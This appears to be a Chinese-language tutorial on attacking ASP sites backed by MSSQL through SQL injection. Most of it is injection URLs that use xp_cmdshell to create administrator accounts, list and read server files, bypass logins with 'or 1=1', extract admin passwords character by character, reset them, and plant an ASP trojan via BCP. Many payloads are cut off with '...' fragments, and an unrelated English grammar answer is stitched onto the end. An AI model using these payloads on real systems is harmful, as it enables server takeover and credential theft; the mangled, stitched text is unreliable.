MSSQL三个关键系统表sysdatabases系统表：Microsoft SQL Server 上的每个数据库在表中占一行。最初安装 SQL Server 时，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 数据库的项。该表只存储在 master 数据库中。 这个表保存在master数据库中，这个表中保存的是什么信息呢？这个非常重要。他是 保存了所有的库名,以及库的ID和一些相关信息。这里我把对于我们有用的字段名称和相关说明给大家列出来。name //表示库的名字。dbid //表示库的ID，dbid从1到5是系统的。分别是：master、model、msdb、mssqlweb、tempdb 这五个库。用select * from master.dbo.sysdatabases 就可以查询出所有的库名。Sysobjects：SQL-SERVER的每个数据库内都有此系统表，它存放该数据库内创建的所有对象，如约束、默认值、日志、规则、存储过程等，每个对象在表中占一行。以下是此系统表的字段名称和相关说明。Name，id，xtype，uid，status：分别是对象名，对象ID，对象类型，所有者对象的用户ID,对象状态。对象类型(xtype)。可以是下列对象类型中的一种：C = CHECK 约束D = 默认值或 DEFAULT 约束F = FOREIGN KEY 约束L = 日志FN = 标量函数IF = 内嵌表函数P = 存储过程PK = PRIMARY KEY 约束（类型是 K）RF = 复制筛选存储过程S = 系统表TF = 表函数TR = 触发器U = 用户表UQ = UNIQUE 约束（类型是 K）V = 视图X = 扩展存储过程当xtype="U" and status>0代表是用户建立的表，对象名就是表名，对象ID就是表的ID值。用: select * from ChouYFD.dbo.sysobjects where xtype="U" and status>0 就可以列出库ChouYFD中所有的用户建立的表名。syscolumns ：每个表和视图中的每列在表中占一行，存储过程中的每个参数在表中也占一行。该表位于每个数据库中。主要字段有：name ，id， colid ：分别是字段名称，表ID号，字段ID号，其中的 ID 是 刚上我们用sysobjects得到的表的ID号。用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD这个库中，表的ID是123456789中的所有字段列表。三、确定XP_CMDSHELL可执行情况若当前连接数据的帐号具有SA权限，且master.dbo.xp_cmdshell扩展存储过程(调用此存储过程可以直接使用操作系统的shell)能够正确执行，则整个计算机可以通过以下几种方法完全控制，以后的所有步骤都可以省1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp执行异常但可以得到当前连接数据库的用户名(若显示dbo则代表SA)。2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp执行异常但可以得到当前连接的数据库名。3、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell net user aaa bbb /add-- (master是SQL-SERVER的主数据库；名中的分号表示SQL-SERVER执行完分号前的语句名，继续执行其后面的语句；—号是注解，表示其后面的所有内容仅为注释，系统并不执行)可以直接增加操作系统帐户aaa,密码为bbb。4、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell net localgroup administrators aaa /add-- 把刚刚增加的帐户aaa加到administrators组中。5、HTTP://xxx.xxx.xxx/abc.asp?p=YY；backuup database 数据库名 to disk="c:inetpubwwwrootsave.db" 则把得到的数据内容全部备份到WEB目录下，再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。6、通过复制CMD创建UNICODE漏洞HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell copy c:winntsystem32cmd.exe c:inetpubscriptscmd.exe 便制造了一个UNICODE漏洞，通过此漏洞的利用方法，便完成了对整个计算机的控制(当然首选要知道WEB虚拟目录)。四、发现WEB虚拟目录只有找到WEB虚拟目录，才能确定放置ASP木马的位置，进而得到USER权限。有两种方法比较有效。一是根据经验猜解，一般来说，WEB虚拟目录是：c:inetpubwwwroot; D:inetpubwwwroot; E:inetpubwwwroot等，而可执行虚拟目录是：c:inetpubscripts; D:inetpubscripts; E:inetpubscripts等。二是遍历系统的目录结构，分析结果并发现WEB虚拟目录；先创建一个临时表：tempHTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--接下来：（1）我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中：HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--我们可以通过查询temp的内容来获得驱动器列表及相关信息（2）我们可以利用xp_subdirs获得子目录列表,并存入temp表中：HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs "c:";--（3）我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中：HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree "c:";--这样就可以成功的浏览到所有的目录（文件夹）列表：如果我们需要查看某个文件的内容，可以通过执行xp_cmdsell：HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec ... nbsp;"type c:webindex.asp";--使用"bulk insert"语法可以将一个文本文件插入到一个临时表中。如：bulk insert temp(id) from "c:inetpubwwwrootindex.asp"浏览temp就可以看到index.asp文件的内容了！通过分析各种ASP文件，可以得到大量系统信息，WEB建设与管理信息，甚至可以得到SA帐号的连接密码。当然，如果xp_cmshell能够执行，我们可以用它来完成：HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&nbs ... cmdshell "dir c:";--HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&n ... p_cmdshell "dir c: *.asp /s/a";--通过xp_cmdshell我们可以看到所有想看到的，包括W3svcHTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshe ... ubAdminScriptsadsutil.vbs enum w3svc"但是，如果不是SA权限，我们还可以使用HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree "c:";--注意：1、以上每完成一项浏览后，应删除TEMP中的所有内容，删除方法是：HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--2、浏览TEMP表的方法是：(假设TestDB是当前连接的数据库名)HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一条记录id字段的值，并与整数进行比较，显然abc.asp工作异常，但在异常中却可以发现id字段的值。假设发现的表名是xyz，则HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in("xyz"))>0 得到表TEMP中第二条记录id字段的值。五、上传ASP木马所谓ASP木马，就是一段有特殊功能的ASP代码，并放入WEB虚拟目录的Scripts下，远程客户通过IE就可执行它，进而得到系统的USER权限，实现对系统的初步控制。上传ASP木马一般有两种比较有效的方法：1、利用WEB的远程管理功能许多WEB站点，为了维护的方便，都提供了远程管理的功能；也有不少WEB站点，其内容是对于不同的用户有不同的访问权限。为了达到对用户权限的控制，都有一个网页，要求用户名与密码，只有输入了正确的值，才能进行下一步的操作,可以实现对WEB的管理，如上传、下载文件，目录浏览、修改配置等。因此，若获取正确的用户名与密码，不仅可以上传ASP木马，有时甚至能够直接得到USER权限而浏览系统，上一步的发现WEB虚拟目录的复杂操作都可省略。用户名及密码一般存放在一张表中，发现这张表并读取其中内容便解决了问题。以下给出两种有效方法。A、 注入法：从理论上说，认证网页中会有型如：select * from admin where username="XXX" and password="YYY" 的语句，若在正式运行此句之前，没有进行必要的字符过滤，则很容易实施SQL注入。如在用户名文本框内输入：abc" or 1=1-- 在密码框内输入：123 则SQL语句变成：select * from admin where username="abc" or 1=1 and password="123" 不管用户输入任何用户名与密码，此语句永远都能正确执行，用户轻易骗过系统，获取合法身份。B、猜解法：基本思路是：猜解所有数据库名称，猜出库中的每张表名，分析可能是存放用户名与密码的表名，猜出表中的每个字段名，猜出表中的每条记录内容。l 猜解所有数据库名称HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因为 dbid 的值从1到5，是系统用了。所以用户自己建的一定是从6开始的。并且我们提交了 name>1 (name字段是一个字符型的字段和数字比较会出错),abc.asp工作异常，可得到第一个数据库名，同理把DBID分别改成7,8，9,10,11,12...就可得到所有数据库名。以下假设得到的数据库名是TestDB。l 猜解数据库中用户名表的名称猜解法：此方法就是根据个人的经验猜表名，一般来说，user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通过语句进行判断HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在，则abc.asp工作正常，否则异常。如此循环，直到猜到系统帐号表的名称。读取法：SQL-SERVER有一个存放系统核心信息的表sysobjects，有关一个库的所有表，视图等信息全部存放在此表中，而且此表可以通过WEB进行访问。当xtype="U" and status>0代表是用户建立的表，发现并分析每一个用户建立的表及名称，便可以得到用户名表的名称，基本的实现方法是：①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type="U" and status>0 )>0 得到第一个用户建立表的名称，并与整数进行比较，显然abc.asp工作异常，但在异常中却可以发现表的名称。假设发现的表名是xyz，则②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in("xyz"))>0 可以得到第二个用户建立的表的名称，同理就可得到所有用建立的表的名称。根据表的名称，一般可以认定那张表用户存放用户名及密码，以下假设此表名为Admin。l 猜解用户名字段及密码字段名称admin表中一定有一个用户名字段，也一定有一个密码字段，只有得到此两个字段的名称，才有可能得到此两字段的内容。如何得到它们的名称呢，同样有以下两种方法。猜解法：此方法就是根据个人的经验猜字段名，一般来说，用户名字段的名称常用：username,name,user,account等。而密码字段的名称常用：password,pass,pwd,passwd等。并通过语句进行判断HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(字段名) from TestDB.dbo.admin)>0 select count(字段名) from 表名语句得到表的行数，所以若字段名存在，则abc.asp工作正常，否则异常。如此循环，直到猜到两个字段的名称。读取法：基本的实现方法是HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id("admin"),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id("admin"),1) from TestDB.dbo.sysobjects是从sysobjects得到已知表名的第一个字段名，当与整数进行比较，显然abc.asp工作异常，但在异常中却可以发现字段的名称。把col_name(object_id("admin"),1)中的1依次换成2,3,4,5，6...就可得到所有的字段名称。l 猜解用户名与密码猜用户名与密码的内容最常用也是最有效的方法有：ASCII码逐字解码法:虽然这种方法速度较慢，但肯定是可行的。基本的思路是先猜出字段的长度，然后依次猜出每一位的值。猜用户名与猜密码的方法相同，以下以猜用户名为例说明其过程。HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2，3,4，5，... n，username为用户名字段的名称，admin为表的名称)，若x为某一值i且abc.asp运行正常时，则i就是第一个用户名的长度。如：当输入HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8时abc.asp运行正常，则第一个用户名的长度为8HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用户名长度之间，当m=1，2,3，...时猜测分别猜测第1,2,3,...位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之间的任意值；admin为系统用户帐号表的名称)，若n为某一值i且abc.asp运行正常时，则i对应ASCII码就是用户名某一位值。如：当输入HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80时abc.asp运行正常，则用户名的第三位为P(P的ASCII为80)；HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33时abc.asp运行正常，则用户名的第9位为!(!的ASCII为33)；猜到第一个用户名及密码后，同理，可以猜出其他所有用户名与密码。注意：有时得到的密码可能是经MD5等方式加密后的信息，还需要用专用工具进行脱密。或者先改其密码，使用完后再改回来，见下面说明。简单法：猜用户名用HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一个字段，username是用户名字段，此时abc.asp工作异常，但能得到Username的值。与上同样的方法，可以得到第二用户名，第三个用户等等，直到表中的所有用户名。猜用户密码：HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一个字段，pwd是密码字段，此时abc.asp工作异常，但能得到pwd的值。与上同样的方法，可以得到第二用户名的密码，第三个用户的密码等等，直到表中的所有用户的密码。密码有时是经MD5加密的，可以改密码。HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=" ... where username="www";-- ( 1的MD5值为：AAABBBCCCDDDEEEF，即把密码改成1；www为已知的用户名)用同样的方法当然可把密码改原来的值。2、利用表内容导成文件功能SQL有BCP命令，它可以把表的内容导成文本文件并放到指定位置。利用这项功能，我们可以先建一张临时表，然后在表中一行一行地输入一个ASP木马，然后用BCP命令导出形成ASP文件。命令行格式如下：bcp select * from text..foo queryout c:inetpubwwwroot uncommand.asp -c -S

instead of "替代",重点词在of上.它是个介词,所以该加上名词性结构,如名词(短语) 代词宾格 宾语从句等,但是介宾结构也可以,尤其小心的是动词该用动名词形式,即Ving;rather than (是...)而不是... 从语法角度上看它是个连词,前后成分在形式上必须保持一致,所以后面的结构应该与前面保持一样,就有可能出现代词主格,动词的各种形式,不一而足,但关键是和与它对比的结构形式要一致!如: I"ll go there instead of him. I rather than he(与I一致) will go there.再如: Yesterday he walked here instead of driving here. Yesterday he walked here rather than drove(与walked一致) here.请采纳答案，支持我一下。